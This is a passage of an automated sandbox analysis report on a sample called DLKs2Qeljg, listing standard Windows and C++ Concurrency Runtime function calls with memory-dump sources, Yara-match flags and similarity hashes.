                                                                                                        • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 1674182817-0
                                                                                                        • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                        • Instruction ID: d6aee8eeab7679cddf2920f1b156e576fe8da9d9113af9da394846de6f1d506f
                                                                                                        • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                        • Instruction Fuzzy Hash: 22F0A7B25803153DE721B7755C0AFBB36DD9B01751F500966B919E7084EFA9D8048AB8
                                                                                                        APIs
                                                                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02131332
                                                                                                          • Part of subcall function 02130BA4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02130BC6
                                                                                                          • Part of subcall function 02130BA4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02130BE7
                                                                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02131345
                                                                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02131351
                                                                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0213135A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                        • String ID:
                                                                                                        • API String ID: 4284812201-0
                                                                                                        • Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                        • Instruction ID: fa96e30c1253839e5d7aca13d9c0c43a862c2fe5ac571c796e4f948e15e008f9
                                                                                                        • Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                        • Instruction Fuzzy Hash: 9CF0E2317C0718BF9F2ABBB448605BE32E78F85364F080129E916AB7C0DF718D05DAA4
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0213D078
                                                                                                        • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0213D09C
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0213D0AF
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0213D0BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                        • String ID:
                                                                                                        • API String ID: 3657713681-0
                                                                                                        • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                        • Instruction ID: c3015ac25e6128ed145d350ff27cebd200f7804333b72ae9f00153fe416f660b
                                                                                                        • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                        • Instruction Fuzzy Hash: 7EF02E359806046BC726FB54F841D6EB77F9FD0F14721817AD81563181DF31A90ACB96
                                                                                                        APIs
                                                                                                        • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041262B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3803302727-0
                                                                                                        • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                        • Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
                                                                                                        • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                        • Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C
                                                                                                        APIs
                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 02125A79
                                                                                                        • __Cnd_signal.LIBCPMT ref: 02125A85
                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 02125A9A
                                                                                                        • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02125AA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2059591211-0
                                                                                                        • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                        • Instruction ID: 283efa2de8ef06b37663134763f863298e9f91ac13b1a31861a89df2a62590fc
                                                                                                        • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                        • Instruction Fuzzy Hash: 80F0A032480721AFEB31BB31D80671A77B3AF00725F144818F049568A1CF7AA87D4E65
                                                                                                        APIs
                                                                                                        • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 0213285F
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,02138820,?,?,?,?,00000000,?,00000000), ref: 0213286E
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132884
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02132892
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3803302727-0
                                                                                                        • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                        • Instruction ID: e147866fcf595335625b0f21bd9d84e218afa9d8367bae39b086d348194ea3af
                                                                                                        • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                        • Instruction Fuzzy Hash: 45F0A03454020ABBCF11FFA4CD45EAF37A96B00B11F600660B914E20A0DB74DA049BA4
                                                                                                        APIs
                                                                                                        • ___crtCreateEventExW.LIBCPMT ref: 0041231C
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041234E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 200240550-0
                                                                                                        • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                        • Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
                                                                                                        • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                        • Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC
                                                                                                        APIs
                                                                                                        • ___crtCreateEventExW.LIBCPMT ref: 02132583
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,02130D90), ref: 02132591
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021325A7
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021325B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 200240550-0
                                                                                                        • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                        • Instruction ID: 9b3cbbe6ccc728fb054d3c545cd07ce87b1a1e8f0bae171729c612754fbb72c5
                                                                                                        • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                        • Instruction Fuzzy Hash: ABE0D8626803192DE711B7754C13FBB369D5B00B45F940821BD18E50C1FF64DA0445A4
                                                                                                        APIs
                                                                                                          • Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                        • TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
                                                                                                        • GetLastError.KERNEL32 ref: 00423981
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004239A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3735082963-0
                                                                                                        • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                        • Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
                                                                                                        • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                        • Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C
                                                                                                        APIs
                                                                                                          • Part of subcall function 02132949: TlsAlloc.KERNEL32(?,02130D90), ref: 0213294F
                                                                                                        • TlsAlloc.KERNEL32(?,02130D90), ref: 02143BD6
                                                                                                        • GetLastError.KERNEL32 ref: 02143BE8
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02143BFE
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02143C0C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3735082963-0
                                                                                                        • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                        • Instruction ID: 26ab81c9d573f72d79c0d00a554979a1608222f9b9418e3356294efba27d17a4
                                                                                                        • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                        • Instruction Fuzzy Hash: 17E0D834484315AFC714BFB5AC49B7E36A96B00725B600E76E93AE30A0EF35D1058F6D
                                                                                                        APIs
                                                                                                        • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B29,?,?,?,00000000), ref: 00412527
                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412536
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041255A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016159387-0
                                                                                                        • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                        • Instruction ID: 385e35fad119ba3144d3df74fa1b3009f218c6b200c547ffcefd8a897afd490a
                                                                                                        • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                        • Instruction Fuzzy Hash: 95E04874600119BBC714EFB5DF49AEF73BC7A01745BA0046AA501E2151EAACDA44877D
                                                                                                        APIs
                                                                                                        • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,02130D90,?,?,?,00000000), ref: 0213278E
                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 0213279D
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021327B3
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021327C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016159387-0
                                                                                                        • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                        • Instruction ID: cabe2ed249ac8fa0e4d40c34cb73f8cb73157c6ffb44a17afa85df9400068f45
                                                                                                        • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                        • Instruction Fuzzy Hash: 6CE04F7464020AABCB10FBB59D49AAF73BD6A00B05B600465A905E2150EB78DA088B69
                                                                                                        APIs
                                                                                                        • SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                        • GetLastError.KERNEL32 ref: 0041268D
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004126B1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 4286982218-0
                                                                                                        • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                        • Instruction ID: c34ca93974de366a1d33064525cfd34c096e82c6d40c10065bdc34e64e282c71
                                                                                                        • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                        • Instruction Fuzzy Hash: 08E04F7460011A6BCB14BF619D06BAF37AC6A00745B50082AB515D10A2EEB9D56486AC
                                                                                                        APIs
                                                                                                        • TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412777
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1964976909-0
                                                                                                        • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                        • Instruction ID: adcf13394f918fecad39acecb2caa88bdbfd7867240310386255d15fa00e1845
                                                                                                        • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                        • Instruction Fuzzy Hash: ADE04F346001196BDB10BF619E09AAF77A86A00A45F50442AB515D10A2EEB9E564969C
                                                                                                        APIs
                                                                                                        • SetThreadPriority.KERNEL32(?,?), ref: 021328E8
                                                                                                        • GetLastError.KERNEL32 ref: 021328F4
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0213290A
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02132918
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 4286982218-0
                                                                                                        • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                        • Instruction ID: 4e1ffb4a1d33c3adab27cffb9da356aa21c9889ebfc11d270821d0ba5ec2b44b
                                                                                                        • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                        • Instruction Fuzzy Hash: 43E0863414021A7BDB15BF61DC05FBF37AD6B00745B504835B919E10A0EF39D5049B58
                                                                                                        APIs
                                                                                                        • TlsSetValue.KERNEL32(?,00000000,02137BC8,00000000,?,?,02130D90,?,?,?,00000000,?,00000000), ref: 021329AE
                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021329BA
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021329D0
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021329DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1964976909-0
                                                                                                        • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                        • Instruction ID: 36a4683ad108576f44ee9aeb9b92eb8531f6fc1f862e13a4cbc38f0963022c7c
                                                                                                        • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                        • Instruction Fuzzy Hash: 30E0863414011A6BDF11BFA1CC09BBF3BAE6F00B45B500825BD19E20A0DF35D5148BA8
                                                                                                        APIs
                                                                                                        • TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                        • GetLastError.KERNEL32 ref: 004126F5
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412719
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3103352999-0
                                                                                                        • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                        • Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
                                                                                                        • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                        • Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C
                                                                                                        APIs
                                                                                                        • TlsAlloc.KERNEL32(?,02130D90), ref: 0213294F
                                                                                                        • GetLastError.KERNEL32 ref: 0213295C
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132972
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02132980
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3103352999-0
                                                                                                        • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                        • Instruction ID: e02818651a9950ae83bdbaf5feba5c05b364af33bfe59c67d0bbeae8fa92b1c9
                                                                                                        • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                        • Instruction Fuzzy Hash: 28E0C2301401166B8724BBB49C49A7F32AA6B01B25BA00A25E865E20E0EB78D4084AA8
                                                                                                        APIs
                                                                                                        • Concurrency::critical_section::unlock.LIBCMT ref: 00411E8C
                                                                                                          • Part of subcall function 00411102: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411123
                                                                                                          • Part of subcall function 00411102: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041115A
                                                                                                          • Part of subcall function 00411102: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411166
                                                                                                        • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411E98
                                                                                                          • Part of subcall function 00410A73: Concurrency::critical_section::unlock.LIBCMT ref: 00410A97
                                                                                                        • Concurrency::Context::Block.LIBCONCRT ref: 00411E9D
                                                                                                          • Part of subcall function 00412C51: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C53
                                                                                                        • Concurrency::critical_section::lock.LIBCONCRT ref: 00411EBD
                                                                                                          • Part of subcall function 0041102B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411039
                                                                                                          • Part of subcall function 0041102B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411046
                                                                                                          • Part of subcall function 0041102B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411051
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                        • String ID:
                                                                                                        • API String ID: 3659872527-0
                                                                                                        • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                        • Instruction ID: ed2d31f3ab543830b1ac84c55f73d3a30e810a8eb5be1cc707e5e098c751871c
                                                                                                        • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                        • Instruction Fuzzy Hash: 15E0DF34A00502ABCB08FB21C4665DCFB61BF88354B10821EE462432E1CF789E8BCB88
                                                                                                        APIs
                                                                                                        • Concurrency::critical_section::unlock.LIBCMT ref: 021320F3
                                                                                                          • Part of subcall function 02131369: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0213138A
                                                                                                          • Part of subcall function 02131369: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 021313C1
                                                                                                          • Part of subcall function 02131369: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 021313CD
                                                                                                        • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 021320FF
                                                                                                          • Part of subcall function 02130CDA: Concurrency::critical_section::unlock.LIBCMT ref: 02130CFE
                                                                                                        • Concurrency::Context::Block.LIBCONCRT ref: 02132104
                                                                                                          • Part of subcall function 02132EB8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02132EBA
                                                                                                        • Concurrency::critical_section::lock.LIBCONCRT ref: 02132124
                                                                                                          • Part of subcall function 02131292: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 021312A0
                                                                                                          • Part of subcall function 02131292: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 021312AD
                                                                                                          • Part of subcall function 02131292: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 021312B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
